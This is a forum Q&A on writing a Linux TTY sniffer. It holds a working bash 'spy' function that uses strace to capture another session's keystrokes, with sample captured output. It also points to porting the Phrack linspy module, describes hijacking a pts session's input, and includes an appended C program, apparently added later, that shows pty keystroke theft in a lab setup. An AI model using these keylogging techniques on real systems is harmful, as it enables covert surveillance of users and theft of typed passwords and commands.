How do I write a Linux TTY sniffer?

Posted 2024-08-29 08:31:31 · 406 words · 10 views · 0 comments


For educational purposes (not that anyone should care about the motivations behind such an exercise) I'd like to write a program that can read/write to/from alternate ttys/ptys. I've read papers (from the 1990s) but can't employ the implementation they use on modern Linux/glibc

I was hoping that someone had researched into this in the past (not too far in the past), or at least, read documentation pertaining to it, that they could provide, that would enlighten me further.

I also wonder if (considering the fact that Linux doesn't have streams) if this exercise must be done via a loadable kernel module [lkm].

I have many questions and probably a misunderstanding of some of the fundamental ideologies that allow such objectives to be put in place, could someone help? :)


Comments (3)

吹梦到西洲 2024-09-05 08:31:31

function spy() {
    # PID of the bash attached to /dev/pts/$1 ([s] and [h] keep grep/awk from matching themselves)
    ptsnum=`ps awfux | grep pt[s]\/"$1" | awk '/bas[h]/{print $2}'` ;
    # Trace that shell and its children (strace prints to stderr, so merge it into the pipe),
    # then keep only the short write() calls: readline echoes each keystroke as write(2, "x", 1).
    # The parentheses must be escaped for grep -P; unescaped they form a group and nothing matches.
    /usr/bin/strace -s 1000 -t -f -p $ptsnum 2>&1 3>&1 \
    | grep -Poi 'write\(...\"[[:print:]]{1,2}\"[.][.][.][,]..\)' ;
}

[436] klikevil@epiphany ~ $ w

    09:36:43 up 12:06,  6 users,  load average: 0.46, 0.29, 0.20
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

    klikevil pts/0    75.125.126.8     23:05    2:19m 10:33   0.18s cmd
    klikevil pts/1    75.125.126.8     00:18    6:50m  0.06s  0.04s sshd: klikevil [priv]
    klikevil tty7     :0               09:02   17:07m  2:02   0.32s x-session-manager
    klikevil pts/2    :0.0             09:03    3:30   0.08s  0.08s bash
    klikevil pts/3    :0.0             09:03    0.00s  0.76s  0.00s w
    klikevil pts/4    :0.0             09:06    3:13   0.46s  0.00s /bin/sh /usr/bin/thunder


[437] klikevil@epiphany ~ $ spy 2
write(2, "e"..., 1)
write(2, "c"..., 1)

write(2, "h"..., 1)
write(2, "o"..., 1)
write(2, " "..., 1)
write(2, "s"..., 1)
write(2, "u"..., 1)
write(2, "p"..., 1)
write(2, " "..., 1)
write(2, "d"..., 1)
write(2, "o"..., 1)

write(2, "g"..., 1)
write(2, "\n"..., 1)
^C

Seems to work pretty well if you don't mind sorting through a bunch of line breaks. As for the TTYs: tail -f /dev/vcsa1-6

Jessica

烟花肆意 2024-09-05 08:31:31


The linspy.c code in that Phrack article is a Linux kernel module. It won't compile against a modern kernel, because the internal kernel interfaces change frequently.

However, the basic approach it uses is sound (although it is completely missing locking required for correctness in an SMP environment), and with the application of sufficient elbow grease you should be able to port it to compile against the latest kernel.

甜是你 2024-09-05 08:31:31


I'm ssh'd into a remote Linux box twice, producing /dev/pts/0 and /dev/pts/1. From 0, I can open 1 for read, thereby stealing all the stuff the user types to 1. If I want them to see their typing, I have to write it back to /dev/pts/1. Of course, their input never makes it to their shell, so I have to create a shell process at my end (on 0) and pipe their input to it, then pipe the shell's output back to 1.

This all works great for me. While all this is going on, I can save off all the data read and written during the process wherever I like.

Of course, you can't do this unless you are root or are snooping on a session you own, but you only wanted this for educational purposes, right?
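The relay in this answer as a runnable lab in C, added here (not code from the answer, the question, or the linspy article). Instead of two ssh sessions it creates a private pty pair with the devpts ioctls and opens the slave /dev/pts/N twice, one handle standing in for the victim's shell and one for the snooper, then walks the answer's steps: keystrokes written to the master are consumed by whichever reader of the slave asks first, so the snooper gets them and the real shell is left with nothing; writing the stolen bytes back to the slave puts them on the user's screen; and raw mode, set as a readline shell would set it, is tty state shared by both handles. The type and function names (pty_lab, spy_steal, user_types, victim_starved, pty_lab_scenario) and the keystrokes "echo sup dog\n" are constructed for the example. On a real host the second open succeeds only as root or as the owner of the node, which is the answer's own caveat.

```c
/* pty_spy_lab.c: the relay above on a private pty pair. Linux only (devpts ioctls). Build: cc -Wall pty_spy_lab.c */
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <termios.h>
#include <unistd.h>

/* master: the sshd end (keystrokes in, screen output out); victim: the legitimate shell's
 * handle on the slave; spy: a second open of the same /dev/pts/N, the snooper's handle. */
struct pty_lab { int master, victim, spy; };

/* Read until `ms` milliseconds pass with no data or the buffer fills; returns bytes read. */
static ssize_t drain(int fd, char *buf, size_t cap, int ms)
{
    size_t got = 0;
    while (got < cap) {
        struct pollfd p = { .fd = fd, .events = POLLIN };
        if (poll(&p, 1, ms) <= 0) break; /* timeout or error: nothing more is coming */
        ssize_t n = read(fd, buf + got, cap - got);
        if (n <= 0) break;
        got += (size_t)n;
    }
    return (ssize_t)got;
}

/* Create master + slave and open the slave twice: what posix_openpt(), unlockpt() and
 * ptsname() do on Linux, spelled out with the devpts ioctls. */
int pty_lab_open(struct pty_lab *lab)
{
    unsigned int ptn; int unlock = 0; char path[32];
    lab->victim = lab->spy = -1;
    lab->master = open("/dev/ptmx", O_RDWR | O_NOCTTY);
    if (lab->master < 0 || ioctl(lab->master, TIOCSPTLCK, &unlock) < 0 ||
        ioctl(lab->master, TIOCGPTN, &ptn) < 0) return -1;
    snprintf(path, sizeof path, "/dev/pts/%u", ptn);
    /* Two independent opens of one slave node: the "from pts/0, open pts/1" step. On a real
     * host the second open succeeds only for root or the node's owner. */
    lab->victim = open(path, O_RDWR | O_NOCTTY);
    lab->spy = open(path, O_RDWR | O_NOCTTY);
    if (lab->victim < 0 || lab->spy < 0) return -1;
    /* termios state belongs to the tty, not to an fd, so this covers both handles. Raw mode as
     * a readline-driven shell sets it: no kernel echo, no line buffering, first reader wins. */
    struct termios t;
    if (tcgetattr(lab->victim, &t) < 0) return -1;
    t.c_iflag &= ~(IGNBRK | BRKINT | ICRNL | INLCR | ISTRIP | IXON);
    t.c_oflag &= ~OPOST;
    t.c_lflag &= ~(ECHO | ECHONL | ICANON | ISIG | IEXTEN);
    t.c_cc[VMIN] = 1; t.c_cc[VTIME] = 0;
    return tcsetattr(lab->victim, TCSANOW, &t);
}

/* The remote user types: bytes written to the master arrive as slave input. */
ssize_t user_types(struct pty_lab *lab, const char *keys) { return write(lab->master, keys, strlen(keys)); }
/* The snooper reads the slave. The line discipline hands each byte to exactly one reader,
 * so whatever lands here never reaches the victim's shell. */
ssize_t spy_steal(struct pty_lab *lab, char *buf, size_t cap) { return drain(lab->spy, buf, cap, 200); }
/* Writing to the slave goes out through the master, i.e. onto the user's screen: the
 * "write it back to /dev/pts/1 so they see their typing" step. */
ssize_t spy_echo(struct pty_lab *lab, const char *buf, size_t n) { return write(lab->spy, buf, n); }
/* What the user's terminal displays. */
ssize_t user_sees(struct pty_lab *lab, char *buf, size_t cap) { return drain(lab->master, buf, cap, 200); }

/* 1 if the legitimate shell has nothing left to read (the snooper took it all), 0 if input is
 * still queued, -1 on error. O_NONBLOCK is per open file description: only the victim's handle. */
int victim_starved(struct pty_lab *lab)
{
    int fl = fcntl(lab->victim, F_GETFL);
    if (fl < 0 || fcntl(lab->victim, F_SETFL, fl | O_NONBLOCK) < 0) return -1;
    char c; ssize_t r = read(lab->victim, &c, 1); int err = errno;
    fcntl(lab->victim, F_SETFL, fl);
    return r < 0 && err == EAGAIN;
}

/* Run the whole exchange with `keys` as constructed keystrokes. Returns the number of bytes
 * stolen (all of which also reached the screen unchanged), or -step on failure. */
int pty_lab_scenario(const char *keys, char *stolen, char *screen, size_t cap)
{
    struct pty_lab lab;
    ssize_t want = (ssize_t)strlen(keys), n = 0;
    int rc;
    if (pty_lab_open(&lab) < 0) rc = -1;
    else if (user_types(&lab, keys) != want) rc = -2;
    else if ((n = spy_steal(&lab, stolen, cap)) != want) rc = -3;
    else if (victim_starved(&lab) != 1) rc = -4;
    else if (spy_echo(&lab, stolen, (size_t)n) != n) rc = -5;
    else if (user_sees(&lab, screen, cap) != n || memcmp(stolen, screen, (size_t)n)) rc = -6;
    else rc = (int)n;
    close(lab.spy); close(lab.victim); close(lab.master); /* close(-1) is a harmless EBADF */
    return rc;
}

int main(void)
{
    char stolen[128], screen[128];
    int n = pty_lab_scenario("echo sup dog\n", stolen, screen, sizeof stolen);
    if (n < 0) { fprintf(stderr, "step %d failed\n", -n); return 1; }
    printf("stolen from the victim's tty (%d bytes): %.*s", n, n, stolen);
    printf("victim shell got nothing; user's screen shows: %.*s", n, screen);
}
```

The part of the answer that feeds the stolen input into a shell on the attacker's side and relays that shell's output back is the same two write() calls pointed at a forkpty()'d child; it is left out so the lab stays self-contained and needs no live second session. Note that the relay only works cleanly because the victim's tty is in raw mode: with ICANON and ECHO on, the kernel would echo the keystrokes itself and the snooper would see whole lines rather than individual bytes.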
